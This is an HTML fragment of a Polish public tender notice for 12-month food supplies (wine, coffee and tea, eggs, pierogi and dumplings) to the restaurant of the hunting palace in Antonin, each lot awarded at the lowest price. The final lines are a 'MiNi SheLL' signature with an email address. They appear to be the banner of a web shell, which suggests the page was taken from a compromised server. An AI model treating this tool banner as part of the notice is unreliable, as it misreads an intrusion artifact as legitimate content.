<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Wina..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy win do restauracji Pałacu Myśliwskiego w Antoninie: wina białe, czerwone , bianco, różne rodzaje - szt.440..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.93.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Kawa Lawazza i Herbata Dilmah..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy kawy i herbaty: crema aroma 100 szt - op. 5, lawazza Top class - kg. 93, czekolada gesta - kg 11, lavazza bezkofeinowa 50 szt. - op. 1, herbata dilmah śniadaniowa 100 szt. - op. 25, herbata earl greg 100 szt. - op. 1, herbaty smakowe 25 szt -op. 22..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.86.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Jaja..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy jaj do restauracji Pałacu Myśliwskiego w Antoninie: jaja - szt. 7230, jaja przepiórki - szt. 144.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Wyroby garmażeryjne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy do restauracji Pałacu Myśliwskiego w Antoninie: pyzy drożdżowe - kg 17, pierogi z kapustą i grzybami- kg 71, uszka z grzybami - kg. 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.11.20-5, 15.85.11.20-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com